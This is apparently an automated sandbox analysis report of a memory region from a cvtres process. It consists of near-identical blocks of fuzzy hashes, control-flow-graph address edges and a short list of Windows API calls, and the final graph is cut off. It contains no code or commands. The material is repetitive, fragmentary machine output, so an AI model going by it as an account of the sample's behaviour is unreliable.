                                                                          • API ID: DispatcherExceptionUser$DisplayExitInitializeThunkWarningsWindows
                                                                          • String ID:
                                                                          • API String ID: 4242710221-0
                                                                          • Opcode ID: 18e7c355c39d0c5652e38be1f51a00f2990e75fece9d9d4c1e2b81852dd097a0
                                                                          • Instruction ID: ba37bd69bafe061dc1e83b7dd950c036dcda7a42208c5f294efb76abf99d654e
                                                                          • Opcode Fuzzy Hash: 18e7c355c39d0c5652e38be1f51a00f2990e75fece9d9d4c1e2b81852dd097a0
                                                                          • Instruction Fuzzy Hash: 3532F6B4A04268CFCB649F70D99879DB7B6BB88305F1085EAD94EA3350CB359E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 5859 9ecc60a-9ecc61c 5861 9ecc622-9ecc627 5859->5861 5863 9ecc62d-9ecc63f 5861->5863 5864 9ecc646-9ecc66e 5863->5864 5866 9ecc674-9ecc686 5864->5866 5867 9ecc68d-9ecc6b5 5866->5867 5869 9ecc6bb-9ecc6cd 5867->5869 5870 9ecc6d4-9ecc6fc 5869->5870 5872 9ecc702-9ecc714 5870->5872 5873 9ecc71b-9ecc743 5872->5873 5875 9ecc749-9ecc75b 5873->5875 5876 9ecc762-9ecc78a 5875->5876 5878 9ecc790-9ecc7a2 5876->5878 5879 9ecc7a9-9ecc7d1 5878->5879 5881 9ecc7d7-9ecc7e9 5879->5881 5882 9ecc7f0-9ecc818 5881->5882 5884 9ecc81e-9ecc830 5882->5884 5885 9ecc837-9ecc85f 5884->5885 5887 9ecc865-9ecc877 5885->5887 5888 9ecc87e-9ecc8a6 5887->5888 5890 9ecc8ac-9ecc8be 5888->5890 5891 9ecc8c5-9ecc8ed 5890->5891 5893 9ecc8f3-9ecc905 5891->5893 5894 9ecc90c-9ecc934 5893->5894 5896 9ecc93a-9ecc94c 5894->5896 5897 9ecc953-9ecc97e 5896->5897 5899 9ecc984-9ecc996 5897->5899 5900 9ecc99d-9ecca06 DisplayExitWindowsWarnings 5899->5900 5904 9ecca0c-9ecca76 5900->5904 5910 9ecca81-9ecca93 KiUserExceptionDispatcher 5904->5910 5911 9ecca9b-9eccaaa 5910->5911 5913 9eccab5 5911->5913 5914 9eccabd-9eccad8 5913->5914 5917 9eccae3 5914->5917 5918 9eccaeb-9eccb06 5917->5918 5921 9eccb11 5918->5921 5922 9eccb19-9eccb34 5921->5922 5925 9eccb3f 5922->5925 5926 9eccb47-9eccb62 5925->5926 5929 9eccb6d-9eccbe1 LdrInitializeThunk 5926->5929 5931 9eccf05 5929->5931 5932 9eccbe7-9eccc0b 5929->5932 5933 9eccf0b-9eccf1d 5931->5933 5937 9eccd64-9eccd88 5932->5937 5938 9eccc11 5932->5938 5935 9eccf24-9eccf4f 5933->5935 5942 9eccf55-9eccf67 5935->5942 5946 9eccd8e-9eccd90 5937->5946 5947 9eccd8a 5937->5947 5938->5937 5940 9eccc17-9eccd58 5938->5940 6028 9eccd5f 5940->6028 5945 9eccf6e-9eccf99 5942->5945 5953 9eccf9f-9eccfb1 5945->5953 5952 9eccd97-9eccdc1 5946->5952 5950 9eccd8c 5947->5950 5951 9eccd92 5947->5951 5950->5946 5951->5952 5961 9eccdc7-9eccdc9 5952->5961 5962 9eccdc3 5952->5962 5956 9eccfb8-9eccfe3 5953->5956 5964 9eccfe9-9eccffb 5956->5964 5963 9eccdd0-9eccdd6 5961->5963 5965 9eccdcb 5962->5965 5966 9eccdc5 5962->5966 5963->5931 5967 9eccddc-9eccecf 5963->5967 5969 9ecd002-9ecd02d 5964->5969 5965->5963 5966->5961 6025 9ecceda 5967->6025 5975 9ecd033-9ecd045 5969->5975 5978 9ecd04c-9ecd089 KiUserExceptionDispatcher 5975->5978 5982 9ecd093-9ecd0a5 5978->5982 5985 9ecd0ac-9ecd0d7 5982->5985 5990 9ecd0dd-9ecd0ef 5985->5990 5993 9ecd0f6-9ecd121 5990->5993 5998 9ecd127-9ecd139 5993->5998 6001 9ecd140-9ecd16b 5998->6001 6007 9ecd171-9ecd183 6001->6007 6008 9ecd18a-9ecd1b5 6007->6008 6014 9ecd1bb-9ecd1cd 6008->6014 6017 9ecd1d4-9ecd1ff 6014->6017 6022 9ecd205-9ecd217 6017->6022 6026 9ecd21e-9ecd249 6022->6026 6025->5931 6029 9ecd24f-9ecd261 6026->6029 6028->5931 6030 9ecd268-9ecd293 6029->6030 6032 9ecd299-9ecd2ab 6030->6032 6033 9ecd2b2-9ecd2dd 6032->6033 6035 9ecd2e3-9ecd2f5 6033->6035 6036 9ecd2fc-9ecd327 6035->6036 6038 9ecd32d-9ecd37b 6036->6038 6041 9ecd671-9ecd682 6038->6041 6042 9ecd381-9ecd3a4 6038->6042 6045 9ecd688-9ecd68f 6041->6045 6046 9ecd9e2-9ecd9e9 6041->6046 6052 9ecd659-9ecd66e 6042->6052 6053 9ecd3aa-9ecd41c 6042->6053 6048 9ecd728-9ecd72f 6045->6048 6049 9ecd695-9ecd6f5 6045->6049 6050 9ecd9ef-9ecda60 6046->6050 6051 9ecda6b-9ecda86 6046->6051 6054 9ecd735-9ecd87a call 9ecb2e0 call 9ecaee8 6048->6054 6055 9ecd8a1-9ecd8a8 6048->6055 6049->6046 6050->6051 6064 9ecd66f 6052->6064 6083 9ecd641-9ecd653 6053->6083 6084 9ecd422-9ecd429 6053->6084 6054->6046 6055->6046 6059 9ecd8ae 6055->6059 6065 9ecd8b3 6059->6065 6064->6064 6070 9ecd8bf-9ecd995 call 9ecb2e0 call 9ecaee8 call 9ecaf30 6065->6070 6136 9ecd9a1 6070->6136 6083->6052 6083->6053 6087 9ecd42f-9ecd53d 6084->6087 6088 9ecd542-9ecd56d 6084->6088 6087->6083 6088->6083 6092 9ecd573-9ecd616 6088->6092 6092->6083 6140 9ecd9a9 6136->6140 6145 9ecd9b0-9ecd9b7 6140->6145 6149 9ecd9c3 6145->6149 6149->6046
                                                                          APIs
                                                                          • DisplayExitWindowsWarnings.USER32 ref: 09ECC9BC
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECCA8D
                                                                          • LdrInitializeThunk.NTDLL ref: 09ECCB7B
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECD077
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$DisplayExitInitializeThunkWarningsWindows
                                                                          • String ID:
                                                                          • API String ID: 4242710221-0
                                                                          • Opcode ID: 7a734f181885976ed9376bfba357761bafd876e289787d6279094a903fae5ef9
                                                                          • Instruction ID: b8c7000169185d90ffc2f7b364677df5d1c1a5ed5f8eb330c3c85d1dca6f81fa
                                                                          • Opcode Fuzzy Hash: 7a734f181885976ed9376bfba357761bafd876e289787d6279094a903fae5ef9
                                                                          • Instruction Fuzzy Hash: 0632F6B4A04268CFCB649F70D99879DB7B6BB88305F1085EAD94EA3350CB359E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 6168 9ecc648-9ecc660 6170 9ecc669-9ecc66e 6168->6170 6172 9ecc674-9ecc686 6170->6172 6173 9ecc68d-9ecc6b5 6172->6173 6175 9ecc6bb-9ecc6cd 6173->6175 6176 9ecc6d4-9ecc6fc 6175->6176 6178 9ecc702-9ecc714 6176->6178 6179 9ecc71b-9ecc743 6178->6179 6181 9ecc749-9ecc75b 6179->6181 6182 9ecc762-9ecc78a 6181->6182 6184 9ecc790-9ecc7a2 6182->6184 6185 9ecc7a9-9ecc7d1 6184->6185 6187 9ecc7d7-9ecc7e9 6185->6187 6188 9ecc7f0-9ecc818 6187->6188 6190 9ecc81e-9ecc830 6188->6190 6191 9ecc837-9ecc85f 6190->6191 6193 9ecc865-9ecc877 6191->6193 6194 9ecc87e-9ecc8a6 6193->6194 6196 9ecc8ac-9ecc8be 6194->6196 6197 9ecc8c5-9ecc8ed 6196->6197 6199 9ecc8f3-9ecc905 6197->6199 6200 9ecc90c-9ecc934 6199->6200 6202 9ecc93a-9ecc94c 6200->6202 6203 9ecc953-9ecc97e 6202->6203 6205 9ecc984-9ecc996 6203->6205 6206 9ecc99d-9ecca06 DisplayExitWindowsWarnings 6205->6206 6210 9ecca0c-9ecca76 6206->6210 6216 9ecca81-9ecca93 KiUserExceptionDispatcher 6210->6216 6217 9ecca9b-9eccaaa 6216->6217 6219 9eccab5 6217->6219 6220 9eccabd-9eccad8 6219->6220 6223 9eccae3 6220->6223 6224 9eccaeb-9eccb06 6223->6224 6227 9eccb11 6224->6227 6228 9eccb19-9eccb34 6227->6228 6231 9eccb3f 6228->6231 6232 9eccb47-9eccb62 6231->6232 6235 9eccb6d-9eccbe1 LdrInitializeThunk 6232->6235 6237 9eccf05 6235->6237 6238 9eccbe7-9eccc0b 6235->6238 6239 9eccf0b-9eccf1d 6237->6239 6243 9eccd64-9eccd88 6238->6243 6244 9eccc11 6238->6244 6241 9eccf24-9eccf4f 6239->6241 6248 9eccf55-9eccf67 6241->6248 6252 9eccd8e-9eccd90 6243->6252 6253 9eccd8a 6243->6253 6244->6243 6246 9eccc17-9eccd58 6244->6246 6334 9eccd5f 6246->6334 6251 9eccf6e-9eccf99 6248->6251 6259 9eccf9f-9eccfb1 6251->6259 6258 9eccd97-9eccdc1 6252->6258 6256 9eccd8c 6253->6256 6257 9eccd92 6253->6257 6256->6252 6257->6258 6267 9eccdc7-9eccdc9 6258->6267 6268 9eccdc3 6258->6268 6262 9eccfb8-9eccfe3 6259->6262 6270 9eccfe9-9eccffb 6262->6270 6269 9eccdd0-9eccdd6 6267->6269 6271 9eccdcb 6268->6271 6272 9eccdc5 6268->6272 6269->6237 6273 9eccddc-9eccecf 6269->6273 6275 9ecd002-9ecd02d 6270->6275 6271->6269 6272->6267 6331 9ecceda 6273->6331 6281 9ecd033-9ecd045 6275->6281 6284 9ecd04c-9ecd089 KiUserExceptionDispatcher 6281->6284 6288 9ecd093-9ecd0a5 6284->6288 6291 9ecd0ac-9ecd0d7 6288->6291 6296 9ecd0dd-9ecd0ef 6291->6296 6299 9ecd0f6-9ecd121 6296->6299 6304 9ecd127-9ecd139 6299->6304 6307 9ecd140-9ecd16b 6304->6307 6313 9ecd171-9ecd183 6307->6313 6314 9ecd18a-9ecd1b5 6313->6314 6320 9ecd1bb-9ecd1cd 6314->6320 6323 9ecd1d4-9ecd1ff 6320->6323 6328 9ecd205-9ecd217 6323->6328 6332 9ecd21e-9ecd249 6328->6332 6331->6237 6335 9ecd24f-9ecd261 6332->6335 6334->6237 6336 9ecd268-9ecd293 6335->6336 6338 9ecd299-9ecd2ab 6336->6338 6339 9ecd2b2-9ecd2dd 6338->6339 6341 9ecd2e3-9ecd2f5 6339->6341 6342 9ecd2fc-9ecd327 6341->6342 6344 9ecd32d-9ecd37b 6342->6344 6347 9ecd671-9ecd682 6344->6347 6348 9ecd381-9ecd3a4 6344->6348 6351 9ecd688-9ecd68f 6347->6351 6352 9ecd9e2-9ecd9e9 6347->6352 6358 9ecd659-9ecd66e 6348->6358 6359 9ecd3aa-9ecd41c 6348->6359 6354 9ecd728-9ecd72f 6351->6354 6355 9ecd695-9ecd6f5 6351->6355 6356 9ecd9ef-9ecda60 6352->6356 6357 9ecda6b-9ecda86 6352->6357 6360 9ecd735-9ecd87a call 9ecb2e0 call 9ecaee8 6354->6360 6361 9ecd8a1-9ecd8a8 6354->6361 6355->6352 6356->6357 6370 9ecd66f 6358->6370 6389 9ecd641-9ecd653 6359->6389 6390 9ecd422-9ecd429 6359->6390 6360->6352 6361->6352 6365 9ecd8ae 6361->6365 6371 9ecd8b3 6365->6371 6370->6370 6376 9ecd8bf-9ecd995 call 9ecb2e0 call 9ecaee8 call 9ecaf30 6371->6376 6442 9ecd9a1 6376->6442 6389->6358 6389->6359 6393 9ecd42f-9ecd53d 6390->6393 6394 9ecd542-9ecd56d 6390->6394 6393->6389 6394->6389 6398 9ecd573-9ecd616 6394->6398 6398->6389 6446 9ecd9a9 6442->6446 6451 9ecd9b0-9ecd9b7 6446->6451 6455 9ecd9c3 6451->6455 6455->6352
                                                                          APIs
                                                                          • DisplayExitWindowsWarnings.USER32 ref: 09ECC9BC
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECCA8D
                                                                          • LdrInitializeThunk.NTDLL ref: 09ECCB7B
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECD077
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$DisplayExitInitializeThunkWarningsWindows
                                                                          • String ID:
                                                                          • API String ID: 4242710221-0
                                                                          • Opcode ID: dfd3392ba16bc75846283ae58b37db73c670eb19befdaaee7aced9b01c6c1fe4
                                                                          • Instruction ID: aba2446acab21e31479f4940b9c8c655407d687b1ab5ef8e4f7ea19554e7f6b0
                                                                          • Opcode Fuzzy Hash: dfd3392ba16bc75846283ae58b37db73c670eb19befdaaee7aced9b01c6c1fe4
                                                                          • Instruction Fuzzy Hash: 3132F6B4A04268CFCB649F70D99879DB7B6BB88305F1085EAD94EA3350CB359E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 6474 9ecc68f-9ecc6a7 6476 9ecc6b0-9ecc6b5 6474->6476 6478 9ecc6bb-9ecc6cd 6476->6478 6479 9ecc6d4-9ecc6fc 6478->6479 6481 9ecc702-9ecc714 6479->6481 6482 9ecc71b-9ecc743 6481->6482 6484 9ecc749-9ecc75b 6482->6484 6485 9ecc762-9ecc78a 6484->6485 6487 9ecc790-9ecc7a2 6485->6487 6488 9ecc7a9-9ecc7d1 6487->6488 6490 9ecc7d7-9ecc7e9 6488->6490 6491 9ecc7f0-9ecc818 6490->6491 6493 9ecc81e-9ecc830 6491->6493 6494 9ecc837-9ecc85f 6493->6494 6496 9ecc865-9ecc877 6494->6496 6497 9ecc87e-9ecc8a6 6496->6497 6499 9ecc8ac-9ecc8be 6497->6499 6500 9ecc8c5-9ecc8ed 6499->6500 6502 9ecc8f3-9ecc905 6500->6502 6503 9ecc90c-9ecc934 6502->6503 6505 9ecc93a-9ecc94c 6503->6505 6506 9ecc953-9ecc97e 6505->6506 6508 9ecc984-9ecc996 6506->6508 6509 9ecc99d-9ecca06 DisplayExitWindowsWarnings 6508->6509 6513 9ecca0c-9ecca76 6509->6513 6519 9ecca81-9ecca93 KiUserExceptionDispatcher 6513->6519 6520 9ecca9b-9eccaaa 6519->6520 6522 9eccab5 6520->6522 6523 9eccabd-9eccad8 6522->6523 6526 9eccae3 6523->6526 6527 9eccaeb-9eccb06 6526->6527 6530 9eccb11 6527->6530 6531 9eccb19-9eccb34 6530->6531 6534 9eccb3f 6531->6534 6535 9eccb47-9eccb62 6534->6535 6538 9eccb6d-9eccbe1 LdrInitializeThunk 6535->6538 6540 9eccf05 6538->6540 6541 9eccbe7-9eccc0b 6538->6541 6542 9eccf0b-9eccf1d 6540->6542 6546 9eccd64-9eccd88 6541->6546 6547 9eccc11 6541->6547 6544 9eccf24-9eccf4f 6542->6544 6551 9eccf55-9eccf67 6544->6551 6555 9eccd8e-9eccd90 6546->6555 6556 9eccd8a 6546->6556 6547->6546 6549 9eccc17-9eccd58 6547->6549 6637 9eccd5f 6549->6637 6554 9eccf6e-9eccf99 6551->6554 6562 9eccf9f-9eccfb1 6554->6562 6561 9eccd97-9eccdc1 6555->6561 6559 9eccd8c 6556->6559 6560 9eccd92 6556->6560 6559->6555 6560->6561 6570 9eccdc7-9eccdc9 6561->6570 6571 9eccdc3 6561->6571 6565 9eccfb8-9eccfe3 6562->6565 6573 9eccfe9-9eccffb 6565->6573 6572 9eccdd0-9eccdd6 6570->6572 6574 9eccdcb 6571->6574 6575 9eccdc5 6571->6575 6572->6540 6576 9eccddc-9eccecf 6572->6576 6578 9ecd002-9ecd02d 6573->6578 6574->6572 6575->6570 6634 9ecceda 6576->6634 6584 9ecd033-9ecd045 6578->6584 6587 9ecd04c-9ecd089 KiUserExceptionDispatcher 6584->6587 6591 9ecd093-9ecd0a5 6587->6591 6594 9ecd0ac-9ecd0d7 6591->6594 6599 9ecd0dd-9ecd0ef 6594->6599 6602 9ecd0f6-9ecd121 6599->6602 6607 9ecd127-9ecd139 6602->6607 6610 9ecd140-9ecd16b 6607->6610 6616 9ecd171-9ecd183 6610->6616 6617 9ecd18a-9ecd1b5 6616->6617 6623 9ecd1bb-9ecd1cd 6617->6623 6626 9ecd1d4-9ecd1ff 6623->6626 6631 9ecd205-9ecd217 6626->6631 6635 9ecd21e-9ecd249 6631->6635 6634->6540 6638 9ecd24f-9ecd261 6635->6638 6637->6540 6639 9ecd268-9ecd293 6638->6639 6641 9ecd299-9ecd2ab 6639->6641 6642 9ecd2b2-9ecd2dd 6641->6642 6644 9ecd2e3-9ecd2f5 6642->6644 6645 9ecd2fc-9ecd327 6644->6645 6647 9ecd32d-9ecd37b 6645->6647 6650 9ecd671-9ecd682 6647->6650 6651 9ecd381-9ecd3a4 6647->6651 6654 9ecd688-9ecd68f 6650->6654 6655 9ecd9e2-9ecd9e9 6650->6655 6661 9ecd659-9ecd66e 6651->6661 6662 9ecd3aa-9ecd41c 6651->6662 6657 9ecd728-9ecd72f 6654->6657 6658 9ecd695-9ecd6f5 6654->6658 6659 9ecd9ef-9ecda60 6655->6659 6660 9ecda6b-9ecda86 6655->6660 6663 9ecd735-9ecd87a call 9ecb2e0 call 9ecaee8 6657->6663 6664 9ecd8a1-9ecd8a8 6657->6664 6658->6655 6659->6660 6673 9ecd66f 6661->6673 6692 9ecd641-9ecd653 6662->6692 6693 9ecd422-9ecd429 6662->6693 6663->6655 6664->6655 6668 9ecd8ae 6664->6668 6674 9ecd8b3 6668->6674 6673->6673 6679 9ecd8bf-9ecd995 call 9ecb2e0 call 9ecaee8 call 9ecaf30 6674->6679 6745 9ecd9a1 6679->6745 6692->6661 6692->6662 6696 9ecd42f-9ecd53d 6693->6696 6697 9ecd542-9ecd56d 6693->6697 6696->6692 6697->6692 6701 9ecd573-9ecd616 6697->6701 6701->6692 6749 9ecd9a9 6745->6749 6754 9ecd9b0-9ecd9b7 6749->6754 6758 9ecd9c3 6754->6758 6758->6655
                                                                          APIs
                                                                          • DisplayExitWindowsWarnings.USER32 ref: 09ECC9BC
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECCA8D
                                                                          • LdrInitializeThunk.NTDLL ref: 09ECCB7B
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECD077
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$DisplayExitInitializeThunkWarningsWindows
                                                                          • String ID:
                                                                          • API String ID: 4242710221-0
                                                                          • Opcode ID: f9111b7530e9246e26ef99ec0594a0903368514a9b61ef1cccd4081410ac87a5
                                                                          • Instruction ID: a2b5b221c5a6c5c68de82dd1790bf421a2616b102479f38d340da3d1aa278129
                                                                          • Opcode Fuzzy Hash: f9111b7530e9246e26ef99ec0594a0903368514a9b61ef1cccd4081410ac87a5
                                                                          • Instruction Fuzzy Hash: F73207B4A04268CFCB649F70D99879DB7B6BB88305F1085EAD94EA3350CB359E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 6777 9ecc6d6-9ecc6ee 6779 9ecc6f7-9ecc6fc 6777->6779 6781 9ecc702-9ecc714 6779->6781 6782 9ecc71b-9ecc743 6781->6782 6784 9ecc749-9ecc75b 6782->6784 6785 9ecc762-9ecc78a 6784->6785 6787 9ecc790-9ecc7a2 6785->6787 6788 9ecc7a9-9ecc7d1 6787->6788 6790 9ecc7d7-9ecc7e9 6788->6790 6791 9ecc7f0-9ecc818 6790->6791 6793 9ecc81e-9ecc830 6791->6793 6794 9ecc837-9ecc85f 6793->6794 6796 9ecc865-9ecc877 6794->6796 6797 9ecc87e-9ecc8a6 6796->6797 6799 9ecc8ac-9ecc8be 6797->6799 6800 9ecc8c5-9ecc8ed 6799->6800 6802 9ecc8f3-9ecc905 6800->6802 6803 9ecc90c-9ecc934 6802->6803 6805 9ecc93a-9ecc94c 6803->6805 6806 9ecc953-9ecc97e 6805->6806 6808 9ecc984-9ecc996 6806->6808 6809 9ecc99d-9ecca06 DisplayExitWindowsWarnings 6808->6809 6813 9ecca0c-9ecca76 6809->6813 6819 9ecca81-9ecca93 KiUserExceptionDispatcher 6813->6819 6820 9ecca9b-9eccaaa 6819->6820 6822 9eccab5 6820->6822 6823 9eccabd-9eccad8 6822->6823 6826 9eccae3 6823->6826 6827 9eccaeb-9eccb06 6826->6827 6830 9eccb11 6827->6830 6831 9eccb19-9eccb34 6830->6831 6834 9eccb3f 6831->6834 6835 9eccb47-9eccb62 6834->6835 6838 9eccb6d-9eccbe1 LdrInitializeThunk 6835->6838 6840 9eccf05 6838->6840 6841 9eccbe7-9eccc0b 6838->6841 6842 9eccf0b-9eccf1d 6840->6842 6846 9eccd64-9eccd88 6841->6846 6847 9eccc11 6841->6847 6844 9eccf24-9eccf4f 6842->6844 6851 9eccf55-9eccf67 6844->6851 6855 9eccd8e-9eccd90 6846->6855 6856 9eccd8a 6846->6856 6847->6846 6849 9eccc17-9eccd58 6847->6849 6937 9eccd5f 6849->6937 6854 9eccf6e-9eccf99 6851->6854 6862 9eccf9f-9eccfb1 6854->6862 6861 9eccd97-9eccdc1 6855->6861 6859 9eccd8c 6856->6859 6860 9eccd92 6856->6860 6859->6855 6860->6861 6870 9eccdc7-9eccdc9 6861->6870 6871 9eccdc3 6861->6871 6865 9eccfb8-9eccfe3 6862->6865 6873 9eccfe9-9eccffb 6865->6873 6872 9eccdd0-9eccdd6 6870->6872 6874 9eccdcb 6871->6874 6875 9eccdc5 6871->6875 6872->6840 6876 9eccddc-9eccecf 6872->6876 6878 9ecd002-9ecd02d 6873->6878 6874->6872 6875->6870 6934 9ecceda 6876->6934 6884 9ecd033-9ecd045 6878->6884 6887 9ecd04c-9ecd089 KiUserExceptionDispatcher 6884->6887 6891 9ecd093-9ecd0a5 6887->6891 6894 9ecd0ac-9ecd0d7 6891->6894 6899 9ecd0dd-9ecd0ef 6894->6899 6902 9ecd0f6-9ecd121 6899->6902 6907 9ecd127-9ecd139 6902->6907 6910 9ecd140-9ecd16b 6907->6910 6916 9ecd171-9ecd183 6910->6916 6917 9ecd18a-9ecd1b5 6916->6917 6923 9ecd1bb-9ecd1cd 6917->6923 6926 9ecd1d4-9ecd1ff 6923->6926 6931 9ecd205-9ecd217 6926->6931 6935 9ecd21e-9ecd249 6931->6935 6934->6840 6938 9ecd24f-9ecd261 6935->6938 6937->6840 6939 9ecd268-9ecd293 6938->6939 6941 9ecd299-9ecd2ab 6939->6941 6942 9ecd2b2-9ecd2dd 6941->6942 6944 9ecd2e3-9ecd2f5 6942->6944 6945 9ecd2fc-9ecd327 6944->6945 6947 9ecd32d-9ecd37b 6945->6947 6950 9ecd671-9ecd682 6947->6950 6951 9ecd381-9ecd3a4 6947->6951 6954 9ecd688-9ecd68f 6950->6954 6955 9ecd9e2-9ecd9e9 6950->6955 6961 9ecd659-9ecd66e 6951->6961 6962 9ecd3aa-9ecd41c 6951->6962 6957 9ecd728-9ecd72f 6954->6957 6958 9ecd695-9ecd6f5 6954->6958 6959 9ecd9ef-9ecda60 6955->6959 6960 9ecda6b-9ecda86 6955->6960 6963 9ecd735-9ecd87a call 9ecb2e0 call 9ecaee8 6957->6963 6964 9ecd8a1-9ecd8a8 6957->6964 6958->6955 6959->6960 6973 9ecd66f 6961->6973 6992 9ecd641-9ecd653 6962->6992 6993 9ecd422-9ecd429 6962->6993 6963->6955 6964->6955 6968 9ecd8ae 6964->6968 6974 9ecd8b3 6968->6974 6973->6973 6979 9ecd8bf-9ecd995 call 9ecb2e0 call 9ecaee8 call 9ecaf30 6974->6979 7045 9ecd9a1 6979->7045 6992->6961 6992->6962 6996 9ecd42f-9ecd53d 6993->6996 6997 9ecd542-9ecd56d 6993->6997 6996->6992 6997->6992 7001 9ecd573-9ecd616 6997->7001 7001->6992 7049 9ecd9a9 7045->7049 7054 9ecd9b0-9ecd9b7 7049->7054 7058 9ecd9c3 7054->7058 7058->6955
                                                                          APIs
                                                                          • DisplayExitWindowsWarnings.USER32 ref: 09ECC9BC
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECCA8D
                                                                          • LdrInitializeThunk.NTDLL ref: 09ECCB7B
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECD077
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$DisplayExitInitializeThunkWarningsWindows
                                                                          • String ID:
                                                                          • API String ID: 4242710221-0
                                                                          • Opcode ID: 8136d5f4e64e3d88f1d70b339a0e121fe5ef6fa8ff22e467a748178f028f0f5e
                                                                          • Instruction ID: 89666198807bd7898e152e98e1ee946c11ada15a1a1eab510768929e197b3258
                                                                          • Opcode Fuzzy Hash: 8136d5f4e64e3d88f1d70b339a0e121fe5ef6fa8ff22e467a748178f028f0f5e
                                                                          • Instruction Fuzzy Hash: 823207B4A04268CFCB649F70D99879DB7B6BB88305F1085EAD94EA3350CB359E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 7077 9ecc71d-9ecc735 7079 9ecc73e-9ecc743 7077->7079 7081 9ecc749-9ecc75b 7079->7081 7082 9ecc762-9ecc78a 7081->7082 7084 9ecc790-9ecc7a2 7082->7084 7085 9ecc7a9-9ecc7d1 7084->7085 7087 9ecc7d7-9ecc7e9 7085->7087 7088 9ecc7f0-9ecc818 7087->7088 7090 9ecc81e-9ecc830 7088->7090 7091 9ecc837-9ecc85f 7090->7091 7093 9ecc865-9ecc877 7091->7093 7094 9ecc87e-9ecc8a6 7093->7094 7096 9ecc8ac-9ecc8be 7094->7096 7097 9ecc8c5-9ecc8ed 7096->7097 7099 9ecc8f3-9ecc905 7097->7099 7100 9ecc90c-9ecc934 7099->7100 7102 9ecc93a-9ecc94c 7100->7102 7103 9ecc953-9ecc97e 7102->7103 7105 9ecc984-9ecc996 7103->7105 7106 9ecc99d-9ecca06 DisplayExitWindowsWarnings 7105->7106 7110 9ecca0c-9ecca76 7106->7110 7116 9ecca81-9ecca93 KiUserExceptionDispatcher 7110->7116 7117 9ecca9b-9eccaaa 7116->7117 7119 9eccab5 7117->7119 7120 9eccabd-9eccad8 7119->7120 7123 9eccae3 7120->7123 7124 9eccaeb-9eccb06 7123->7124 7127 9eccb11 7124->7127 7128 9eccb19-9eccb34 7127->7128 7131 9eccb3f 7128->7131 7132 9eccb47-9eccb62 7131->7132 7135 9eccb6d-9eccbe1 LdrInitializeThunk 7132->7135 7137 9eccf05 7135->7137 7138 9eccbe7-9eccc0b 7135->7138 7139 9eccf0b-9eccf1d 7137->7139 7143 9eccd64-9eccd88 7138->7143 7144 9eccc11 7138->7144 7141 9eccf24-9eccf4f 7139->7141 7148 9eccf55-9eccf67 7141->7148 7152 9eccd8e-9eccd90 7143->7152 7153 9eccd8a 7143->7153 7144->7143 7146 9eccc17-9eccd58 7144->7146 7234 9eccd5f 7146->7234 7151 9eccf6e-9eccf99 7148->7151 7159 9eccf9f-9eccfb1 7151->7159 7158 9eccd97-9eccdc1 7152->7158 7156 9eccd8c 7153->7156 7157 9eccd92 7153->7157 7156->7152 7157->7158 7167 9eccdc7-9eccdc9 7158->7167 7168 9eccdc3 7158->7168 7162 9eccfb8-9eccfe3 7159->7162 7170 9eccfe9-9eccffb 7162->7170 7169 9eccdd0-9eccdd6 7167->7169 7171 9eccdcb 7168->7171 7172 9eccdc5 7168->7172 7169->7137 7173 9eccddc-9eccecf 7169->7173 7175 9ecd002-9ecd02d 7170->7175 7171->7169 7172->7167 7231 9ecceda 7173->7231 7181 9ecd033-9ecd045 7175->7181 7184 9ecd04c-9ecd089 KiUserExceptionDispatcher 7181->7184 7188 9ecd093-9ecd0a5 7184->7188 7191 9ecd0ac-9ecd0d7 7188->7191 7196 9ecd0dd-9ecd0ef 7191->7196 7199 9ecd0f6-9ecd121 7196->7199 7204 9ecd127-9ecd139 7199->7204 7207 9ecd140-9ecd16b 7204->7207 7213 9ecd171-9ecd183 7207->7213 7214 9ecd18a-9ecd1b5 7213->7214 7220 9ecd1bb-9ecd1cd 7214->7220 7223 9ecd1d4-9ecd1ff 7220->7223 7228 9ecd205-9ecd217 7223->7228 7232 9ecd21e-9ecd249 7228->7232 7231->7137 7235 9ecd24f-9ecd261 